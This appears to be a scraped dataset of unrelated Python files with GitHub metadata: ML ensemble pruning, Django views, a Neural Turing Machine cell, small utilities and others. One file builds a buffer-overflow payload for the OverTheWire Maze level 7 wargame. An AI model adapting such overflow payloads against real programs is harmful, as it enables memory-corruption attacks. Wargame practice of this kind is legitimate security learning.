        yo, P = KLplus.KL_divergence_Pruning_modify(yt, nb_cls, nb_pru)
    elif name_pru == 'KP':
        yo, P = KP.Kappa_Pruning(yt, y, nb_cls, nb_pru)
    elif name_pru == 'OO':
        yo, P, flag = OO.Orientation_Ordering_Pruning(yt, y)
    elif name_pru == 'RE':
        yo, P = RE.Reduce_Error_Pruning(yt, y, nb_cls, nb_pru)
    elif name_pru == 'GMM':  # 'GMM_Algorithm'
        yo, P = GMM.GMM_Algorithm(yt, y, nb_cls, nb_pru)
    elif name_pru == 'LCS':  # 'Local_Search'
        yo, P = LCS.Local_Search(yt, y, nb_cls, nb_pru, epsilon)
    elif name_pru == 'DREP':
        yo, P = DREP.DREP_Pruning(yt, y, nb_cls, rho)
    elif name_pru == 'SEP':
        yo, P = SEP.PEP_SEP(yt, y, nb_cls, rho)
    elif name_pru == 'OEP':
        yo, P = OEP.PEP_OEP(yt, y, nb_cls)
    elif name_pru == 'PEP':
        yo, P = PEP.PEP_PEP(yt, y, nb_cls, rho)
    elif name_pru == 'PEP+':
        yo, P = PEPplus.PEP_PEP_modify(yt, y, nb_cls, rho)
    else:
        # NOTE(review): raising UserWarning (a Warning subclass) is unusual,
        # but kept so existing callers catching it keep working.
        raise UserWarning("LookupError! Check the `name_prune`.")
    # Only 'OO' produces a flag; normalize the others to None.
    if name_pru != 'OO':
        flag = None
    # Convert the boolean membership mask into a list of kept indices.
    P = np.where(P)[0].tolist()
    return deepcopy(yo), deepcopy(P), flag
| [
"yjbian92@gmail.com"
] | yjbian92@gmail.com |
2df0087c181223969f1778538a30039b736953f6 | a1105b30823ae17720fa3353d33d0135808c66f8 | /library.py | 5b6ca2630b528a7003621211fac6c4d89b892e7a | [] | no_license | yonaspassos/Desafio_Zygo_S1 | 0bc5f2c58b8cf4323fc82f4faf3d82ce0e2e7fb3 | 7b586036482f67e2865ceb0323d25b5c81905d16 | refs/heads/master | 2022-02-21T19:38:50.787387 | 2019-09-29T23:27:54 | 2019-09-29T23:27:54 | 208,924,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,021 | py | import json, sys
def read_file():
    """Load and return the book catalogue from ./books.json."""
    with open("books.json", "r") as handle:
        return json.load(handle)
def get_book_title(book):
    """Sort key: a book record's title."""
    return book["book_title"]
def get_author_book(author):
    """Sort key: a book record's author."""
    return author["author"]
def get_year_book(year):
    """Sort key: a book record's edition year."""
    return year["edition_year"]
def sort(sort_direction):
    """Return the books from books.json ordered per `sort_direction`.

    `sort_direction` maps field names ('title', 'author', 'edition_year') to
    'asc'/'desc'. None yields the string "Ordering Exception"; an empty dict
    yields []. Later fields re-sort the list, so the last one listed wins as
    the effective primary key (Python's sort is stable).
    """
    if sort_direction is None:
        return "Ordering Exception"
    if not sort_direction:
        return []
    books = read_file()
    for field, key_fn in (("title", get_book_title),
                          ("author", get_author_book),
                          ("edition_year", get_year_book)):
        direction = sort_direction.get(field)
        if direction:
            books = sorted(books, key=key_fn, reverse=direction == "desc")
    return books
if __name__ == "__main__":
    # Optional argv[1]: path to a JSON file holding the sort-direction dict.
    params = None
    if len(sys.argv) >= 2:
        # NOTE(review): the open() handle is never closed; a `with` block
        # would be cleaner.
        params = json.load(open(sys.argv[1]))
    print(sort(params))
| [
"yona.nantes22@gmail.com"
] | yona.nantes22@gmail.com |
3cbb57e4a7165e2ed5af97716ff49f05db1aadca | fb6edcc4b50ab78462b8e14240b053ccf0b4ebbc | /src/user-py/src/module_executor.py | 5c78f5051b94417c3411b2176847e382d55a2953 | [
"MIT"
] | permissive | yutouhewo/skull | c8809f54b8750244dd8c305aded55e7c144ecf91 | 3990cc78f5bf9580280af516267052a89b088162 | refs/heads/master | 2020-12-24T06:14:16.101185 | 2016-10-31T02:10:27 | 2016-10-31T02:10:27 | 73,163,616 | 1 | 0 | null | 2016-11-08T08:09:01 | 2016-11-08T08:09:01 | null | UTF-8 | Python | false | false | 1,040 | py | # Skull Module Executor
import skullpy.txn as Txn
import skullpy.txndata as TxnData
def run_module_init(init_func, config):
    """Invoke a module's init hook with its configuration; return value ignored."""
    init_func(config)
def run_module_release(release_func):
    """Invoke a module's release/teardown hook; return value ignored."""
    release_func()
def run_module_run(run_func, skull_txn):
    """Wrap the raw transaction, invoke the module's run hook, then persist
    the transaction's message data.

    Returns the hook's result, or False when any exception occurs.
    NOTE(review): the exception is swallowed without logging.
    """
    try:
        txn = Txn.Txn(skull_txn)
        ret = run_func(txn)
        txn.storeMsgData()
        return ret
    except Exception as e:
        return False
def run_module_unpack(unpack_func, skull_txn, data):
    """Invoke the module's unpack hook on raw input `data`.

    Returns the number of bytes consumed as an int; -1 signals an error or
    that the hook returned None (meaning: not enough data / failure).
    """
    txn = Txn.Txn(skull_txn)
    try:
        consumed_length = unpack_func(txn, data)
        txn.storeMsgData()
        if consumed_length is None:
            return -1
        return int(consumed_length)
    except Exception as e:
        return -1 # Error occurred
def run_module_pack(pack_func, skull_txn, skull_txndata):
    """Invoke the module's pack hook to serialize the transaction's output.

    Errors are printed (Python-2 print statement) and swallowed; the
    transaction's message data is destroyed in all cases.
    """
    txn = Txn.Txn(skull_txn)
    txndata = TxnData.TxnData(skull_txndata)
    try:
        pack_func(txn, txndata)
    except Exception as e:
        print "Failed to run_module_pack: {}".format(e)
    finally:
        txn.destroyMsgData()
| [
"hyzwowtools@gmail.com"
] | hyzwowtools@gmail.com |
db5aad1fd1249802143125324cb70af8b14e528b | 48c46cee10379dd3bb77ba1b2b4954bcc7eb9d08 | /OverTheWire/Maze/lvl7/s2.py | e402d838c5fbcbe169c06c7997be194c112d3867 | [] | no_license | Deeby/Pwnables-and-Sploits | 1423b72ad7e1a59c761961430d2638ecfe0bd5f6 | 58bd6bd658943893ccd9a60b3e6a4ec2dade491a | refs/heads/master | 2020-09-09T06:57:08.831062 | 2018-12-06T17:31:51 | 2018-12-06T17:31:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | def main():
payload = "A"*32+"\x34\x00\x00\x00"+"A"*10+"\x48\x00"+"\x01\x00"+"\x00\x00"+"\x00"*20+"\x10\x00\x00\x00"+"\x00"*16+"\x38\xa0\x04\x08"+"AAAA"+"\x08\xa0\x04\x08"+"\x02\x00\x00\x00"+"A"*8+"ebp-"+"\x1b\xdf\xff\xff"
fp = open("test.txt","wb")
fp.write(payload)
fp.close()
pass
main()
| [
"sneakynachos@gmail.com"
] | sneakynachos@gmail.com |
802d3c1e08f8200c2aaf70ec20fc1e5d8b069afb | f8eb12aac7e4b73039b4a757f88b1ebe30d26565 | /ntm/ntm_cell.py | 9a8399ffcfb8ed472be1100accf7373f53b8ae48 | [] | no_license | josh-tobin/tf_ntm | df1bd66afe9f6353e777753383f7b3b0c733108a | 778cdab319fc95ddb6a44eb9c2b2ecb74a5685a8 | refs/heads/master | 2021-01-17T18:32:28.300801 | 2016-06-15T05:14:15 | 2016-06-15T05:14:15 | 61,179,254 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,859 | py | import sys
from os import path
import tensorflow as tf
sys.path.append('/'.join(str.split(path.abspath(__file__), '/')[:-2]))
from ntm.head import ReadHead
from ntm.head import WriteHead
from network.cell import Cell
from network.layers import IdentityLayer
"""
TODO
- Documentation
"""
class NTMCell(Cell):
    """One timestep of a Neural Turing Machine: controller + read/write heads
    over an external memory matrix."""

    def __init__(self, controller_network, memory_size, batch_size,
                 read_head='default', write_head='default', output_net='default',
                 head_hidden_size=32):
        """
        NTMCell represents a single timestep of a Neural Turing Machine.
        :param controller_network: The controller maps the input x_t, previous
                                   read vector r_tm1, and optionally previous
                                   controller state s_tm1 to a state s_t
        :param memory_size: (rows, cols) of the external memory matrix
        :param batch_size: fixed batch size used to build default state
        :param read_head: ReadHead instance, or 'default' to build one
        :param write_head: WriteHead instance, or 'default' to build one
        :param output_net: layer mapping controller state to the cell output,
                           or 'default' for the identity
        :param head_hidden_size: hidden size for default-constructed heads
        """
        super(NTMCell, self).__init__()
        self._batch_size = batch_size
        self._controller_network = controller_network
        if read_head == 'default':
            self._read_head = ReadHead(controller_network.output_shape, memory_size,
                                       batch_size=batch_size,
                                       hidden_size=head_hidden_size)
        else:
            self._read_head = read_head
        if write_head == 'default':
            self._write_head = WriteHead(controller_network.output_shape, memory_size,
                                         batch_size=batch_size,
                                         hidden_size=head_hidden_size)
        else:
            self._write_head = write_head
        if output_net == 'default':
            self._output_net = IdentityLayer()
        else:
            self._output_net = output_net
        self._memory_size = memory_size
        self._check_input()

    def default_state(self):
        """Build the zero initial state: [read vector, controller state,
        memory, read-head state, write-head state]."""
        r_0 = tf.Variable(tf.zeros([self._batch_size, self._memory_size[1]]),
                          trainable=False)
        # Ask the controller once (the original called default_state() twice,
        # creating its variables twice when it returned a truthy state).
        s_0 = self._controller_network.default_state()
        if not s_0:
            s_0 = tf.Variable(tf.zeros([self._batch_size,
                                        self._controller_network.output_shape]),
                              trainable=False)
        memory_0 = tf.Variable(tf.zeros([self._batch_size]
                                        + list(self._memory_size)),
                               trainable=False)
        state = [r_0, s_0, memory_0, self._read_head.default_state(),
                 self._write_head.default_state()]
        return state

    def _check_input(self):
        # Sanity-check collaborator types at construction time.
        assert isinstance(self._controller_network, Cell)
        assert isinstance(self._read_head, ReadHead)
        assert isinstance(self._write_head, WriteHead)
        # The controller network should be compatible with the heads
        #assert self._read_head.state_size == self._controller_network.output_spec
        #assert self._write_head.state_size == self._controller_network.output_spec
        # TODO: finish. Probably need to be more careful about input / output specs.

    def call(self, x_t, r_tm1, s_tm1, memory_tm1, read_args, write_args):
        """Run one NTM step; returns (output, new_state)."""
        s_t, _ = self._controller_network([x_t, r_tm1], s_tm1)
        y_t, _ = self._output_net(s_t)
        r_t, read_state = self._read_head([s_t, memory_tm1], *read_args)
        memory_t, write_state = self._write_head(s_t, memory_tm1, *write_args)
        # Fix: propagate the *updated* memory. The original returned
        # memory_tm1 here, discarding memory_t, so writes never took effect.
        return y_t, [r_t, s_t, memory_t, read_state, write_state]

    def __call__(self, x, *state):
        r_tm1 = state[0]
        s_tm1 = state[1]
        memory_tm1 = state[2]
        read_args = state[3]
        write_args = state[4]
        return self.call(x, r_tm1, s_tm1, memory_tm1, read_args, write_args)
| [
"joshp.tobin@gmail.com"
] | joshp.tobin@gmail.com |
9e86b3518912ee7ce4ce5497fb45ab9c6eb765ab | 295ecf4f254c42e9201657ef0a13ec2c68c40c9b | /info/views.py | 6a2850c2b723ff267061ff6b95988447a8586342 | [] | no_license | zwolf21/StockAdmin-pre2 | 0236061284a6fe8801591608591d21129d4ea7c0 | b21d069ff215c17ce3bca040ecf9b8f48b452ed4 | refs/heads/master | 2021-05-01T09:28:59.818469 | 2016-11-30T17:33:30 | 2016-11-30T17:33:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,923 | py | from django.shortcuts import render, render_to_response
from django.core.urlresolvers import reverse_lazy
from django.views.generic.edit import FormView
from django.views.generic import ListView, DetailView, CreateView, TemplateView
from django.conf import settings
from django.db.models import Q
import os, sys
from .models import Info
from .forms import XlFileForm
from .modules.utils import xlDB2DicIter, is_xlfile
from django.utils import simplejson
from django.http import HttpResponse
# Create your views here.
class DrugInfoFromXlFile(FormView):
    """Upload an Excel price file and (re)build the drug Info table from it."""
    form_class = XlFileForm
    template_name = 'info/get_xlfile_form.html'

    def form_valid(self, form):
        """Validate the uploaded workbook and bulk-create Info rows,
        rendering a per-row success/failure report."""
        recreate = form.cleaned_data['recreate']
        xlfile = self.request.FILES['xlfile']
        if not is_xlfile(xlfile.name):
            context = {
                'error_message': '파일 형식이 일치하지 않습니다',
                'file_name': xlfile.name
            }
            return render_to_response('info/update_failure.html', context)
        # Spool the upload to a temp file so the xls reader can open it by path.
        temp_file = os.path.join(settings.MEDIA_ROOT, 'temp.xls')
        with open(temp_file, 'wb') as fp:
            fp.write(xlfile.read())
        di_table = xlDB2DicIter(temp_file)
        os.remove(temp_file)
        src_field_set = set(di_table[0])
        essential_field_set = {'약품코드', 'EDI코드', '약품명(한글)', '제약회사명', '일반단가', '수가명', '규격단위'}
        # Fix: '<=' (subset) instead of '<' (proper subset) — a sheet holding
        # exactly the essential columns is valid input too.
        if not essential_field_set <= src_field_set:
            context = {
                'error_message': '엑셀파일에 지정된 필수 컬럼(열) 항목이 없습니다',
                'essential_fields': essential_field_set,
                'missing_fields': essential_field_set - src_field_set,
                'input_file_fields': src_field_set,
                'file_name': xlfile.name
            }
            return render_to_response('info/update_failure.html', context)
        if recreate:
            Info.objects.all().delete()
        context = {
            'success_count': 0,
            'failure_count': 0,
            'failures': [],
            'why': ''
        }
        for row in di_table:
            try:
                Info.objects.create(
                    edi=int(row['EDI코드']),
                    code=row['약품코드'],
                    name=row['약품명(한글)'],
                    name_as=row['수가명'],
                    firm=row['제약회사명'],
                    price=row['일반단가'],
                    pkg_amount=row.get('포장단위') or 1,
                    standard_unit=row['규격단위'],
                    narcotic_class=int(row.get('약품법적구분') or 0)
                )
            # Fix: narrowed from a bare 'except:' so SystemExit/KeyboardInterrupt
            # are no longer swallowed; details still come from sys.exc_info().
            except Exception:
                type_err, val_err, trcbk = sys.exc_info()
                context['failures'].append({
                    'error_type': type_err.__name__,
                    'error_value': val_err,
                    'error_drug_name': row.get('약품명(한글)', '약품명 미지정'),
                    'error_drug_code': row.get('약품코드', '약품코드 미지정')
                })
                context['failure_count'] += 1
            else:
                context['success_count'] += 1
        context['total_count'] = context['failure_count'] + context['success_count']
        return render_to_response('info/update_result.html', context)
class IndexTV(TemplateView):
    """Render the static drug-info landing page."""
    template_name = "info/drug_info.html"
| [
"pbr112@naver.com"
] | pbr112@naver.com |
eb026a8262f35b328733bac6b2561e4aa08976fa | cdafb14fe1f4e334960c91b2f53bc7e48b40a93c | /calculator/cal01.py | 6e390e7e0a24cc606412a0c4570c84f7f68c0863 | [] | no_license | alireza-E/alireza- | b15801d8c194fd82990f602d2759d2b67f1d5ec6 | b577ff8a6d81672ce9126e1bdd4ee603458f3207 | refs/heads/master | 2022-12-24T05:41:12.098687 | 2020-10-04T13:40:30 | 2020-10-04T13:40:30 | 301,139,516 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 339 | py |
class cal() :
    """Minimal two-operand calculator over the values given at construction."""

    def __init__(self, x, y):
        # Operands are stored once and reused by every operation.
        self.x = x
        self.y = y

    def mul(self):
        """Return the product x * y."""
        return self.x * self.y

    def div(self):
        """Return the quotient x / y (ZeroDivisionError when y == 0)."""
        return self.x / self.y

    def plus(self):
        """Return the sum x + y."""
        return self.x + self.y

    def neg(self):
        """Return the difference x - y."""
        return self.x - self.y
"Rominash@gmail.com"
] | Rominash@gmail.com |
382ef2aeab005733bc9cbd35416e65ce87242c75 | 93ab9665078d49028e5094e23d673574031d47e5 | /Time_Complexity/matrix_rotation_anticlockwise.py | 69db9f542194a4f504d04d3b302945e8196abc37 | [] | no_license | raghulrage/Python-programs | 7072429108c2932323b5f636d06f97a07c4cb6a4 | 8d134fade8626c99237c48068a2d1f5c6b04a0cc | refs/heads/master | 2023-05-05T23:11:36.407458 | 2020-10-17T05:45:58 | 2020-10-17T05:45:58 | 198,346,485 | 1 | 9 | null | 2021-05-22T12:50:28 | 2019-07-23T03:41:20 | Python | UTF-8 | Python | false | false | 1,977 | py | def reverse(arr, i, j):
for idx in range((j - i + 1) // 2):
arr[i + idx], arr[j - idx] = arr[j - idx], arr[i + idx]
def rotateList(A, K):
    """Rotate list A to the right by K positions, in place; return A.

    Equivalent to the classic three-reversal rotation; raises
    ZeroDivisionError for an empty list, as the original did.
    """
    K %= len(A)
    pivot = len(A) - K
    # Slice-assignment keeps the mutation in place for aliasing callers.
    A[:] = A[pivot:] + A[:pivot]
    return A
def rotateLayers(N, M, R, layers):
    """Rotate every flattened ring in `layers` by R steps.

    Rotating right by (len - R) is a left rotation by R. N and M are
    unused here; they are kept for interface compatibility with callers.
    """
    for ring in layers:
        rotateList(ring, len(ring) - R)
def rotateMatrix(M, N, R, mat):
    """Rotate `mat` in place by R steps along each concentric ring.

    The matrix is decomposed into min(N, M) // 2 rings; each ring is
    unrolled clockwise into a flat list, rotated via rotateLayers, then
    written back along the exact same traversal order.
    NOTE(review): `top` is derived from N and `side` from M, which suggests
    N is the column count and M the row count — confirm against callers
    (main passes a square 4x4, so it cannot disambiguate).
    """
    l = int(min(N, M) // 2)  # number of concentric rings
    layers = [[] for _ in range(l)]
    for level in range(l):
        # Edge lengths for this ring; each walk stops one short of the
        # corner so the four edges chain without duplicating cells.
        top = (N - 1) - 2 * level
        side = (M - 1) - 2 * level
        for i in range(top): # right: top edge, left-to-right
            layers[level].append(mat[level][level + i])
        for j in range(side): # down: right edge, top-to-bottom
            layers[level].append(mat[level + j][level + top])
        for i in range(top): # left: bottom edge, right-to-left
            layers[level].append(mat[level + side][level + top - i])
        for j in range(side): # up: left edge, bottom-to-top
            layers[level].append(mat[level + side - j][level])
    # rotate each layer
    rotateLayers(N, M, R, layers)
    # fill the layers back in, consuming each flat list in the same
    # clockwise order it was built
    for level in range(l):
        top = (N - 1) - 2 * level
        side = (M - 1) - 2 * level
        for i in range(top):
            mat[level][level + i] = layers[level].pop(0) # right
        for j in range(side):
            mat[level + j][level + top] = layers[level].pop(0) # down
        for i in range(top):
            mat[level + side][level + top - i] = layers[level].pop(0) # left
        for j in range(side):
            mat[level + side - j][level] = layers[level].pop(0) # up
def main():
    """Demo driver: rotate a hard-coded 4x4 matrix by one step and print it."""
    M, N, R = 4, 4, 1
    mat = [
        [1, 2, 3, 4],
        [5, 6, 7, 8],
        [9, 10, 11, 12],
        [13, 14, 15, 16],
    ]
    rotateMatrix(M, N, R, mat)  # mutates mat in place
    for row in mat:
        print(*row)


if __name__ == '__main__':
    main()
| [
"noreply@github.com"
] | raghulrage.noreply@github.com |
3a2f9c0807524842512155fb4b75e01efa769efa | 27152f64815b0200c46a8187146e43258beba462 | /take2/w5/SuperUglyNumber.py | d4ca62c25365565276068eb3bce06336c75bebad | [] | no_license | NahusenayH/ComptetiveProgramming | 8ec6ca7ccaf32148c2f958c521b90a8efca3b9f0 | 30b3db60b0d8d105695c2b8418ef8d4c5d317e57 | refs/heads/master | 2021-07-22T14:31:23.683235 | 2020-10-09T12:29:22 | 2020-10-09T12:29:22 | 224,041,330 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 586 | py | import heapq
class Solution:
    def nthSuperUglyNumber(self, n: int, primes: List[int]) -> int:
        """Return the n-th super ugly number (1-indexed; the sequence starts at 1).

        A super ugly number is a positive integer whose prime factors all
        belong to `primes`. Classic k-pointer merge: each prime keeps a
        pointer into the result list, and the next value is the smallest
        prime * ugly[pointer] candidate.

        Bug fix: the original wrote `float(inf)`, which raises NameError
        because the bare name `inf` is never defined; the min() built-in
        removes the need for an infinity sentinel (and the redundant
        float/int round-trips) entirely.
        """
        pointers = [0] * len(primes)  # next result index to multiply, per prime
        ugly = [0] * n
        ugly[0] = 1
        for i in range(1, n):
            # Smallest next candidate across all primes.
            candidates = [p * ugly[pointers[j]] for j, p in enumerate(primes)]
            smallest = min(candidates)
            ugly[i] = smallest
            # Advance every pointer that produced `smallest` so duplicate
            # candidates (e.g. 2*3 and 3*2) are consumed only once.
            for j, c in enumerate(candidates):
                if c == smallest:
                    pointers[j] += 1
        return ugly[-1]
"haile.nahu18@gmail.com"
] | haile.nahu18@gmail.com |
50f14085ebf1fa050502627f08de7bacfbbf9444 | 74c04ef3ed2bc71e728b3bb840c927a86352c6e1 | /djangotesting/jango/resturant/forms.py | 226cb77012fce96d306543ca927164a3764be1ac | [] | no_license | zamanehsani/restaurant | 06b658b277dda8fa8d4f5b598d389767ab61f876 | 0f21ce268fdc21402c32dee1ecc64850a24fcc2a | refs/heads/main | 2023-01-12T04:52:09.541112 | 2020-11-16T05:44:04 | 2020-11-16T05:44:04 | 313,192,805 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 860 | py | from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from resturant.models import Profile
class UserRegisterForm(UserCreationForm):
    """Sign-up form: Django's UserCreationForm (username + password pair)
    extended with a required email, first name and last name."""
    email = forms.EmailField()
    first_name = forms.CharField(max_length=150)
    last_name = forms.CharField(max_length=150)

    class Meta:
        model = User
        fields =['first_name','last_name','username', 'email', 'password1', 'password2']
class UserUpdateForm(forms.ModelForm):
    """Account-edit form for the built-in User model.

    Unlike UserRegisterForm, no field overrides are declared: the
    ModelForm derives name, username and email fields from the model.
    """

    class Meta:
        model = User
        fields =['first_name','last_name','username', 'email']
class UserProfileUpdateForm(forms.ModelForm):
    """Edit the site-specific Profile record (avatar image and gender)."""

    class Meta:
        model = Profile
        fields =['image', 'gender']
"zamanehsani@gmail.com"
] | zamanehsani@gmail.com |
c042e963a867292d5e31a6b9ec9e335cb64f584b | 4b9eaaa8a28c3114c2f60b47b89b4acc05a73ff8 | /venv/Scripts/pip3.8-script.py | f810f5f84dca9aa79b81fd35cc163f9ff2a4daa4 | [] | no_license | ronigold/Jupytext_test_2 | 080a9e308f8b10d5e7d2ea3ced02fd66a92c5457 | 90a018f6ab5bcce15522f45f2d2a66aba4ac52ad | refs/heads/master | 2021-05-24T07:40:22.531855 | 2020-04-06T09:46:43 | 2020-04-06T09:46:43 | 253,454,935 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py | #!C:\Users\rgoldshmidt\PycharmProjects\Jupytext_test_1\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
)
| [
"ronigoldsmid@gmail.com"
] | ronigoldsmid@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.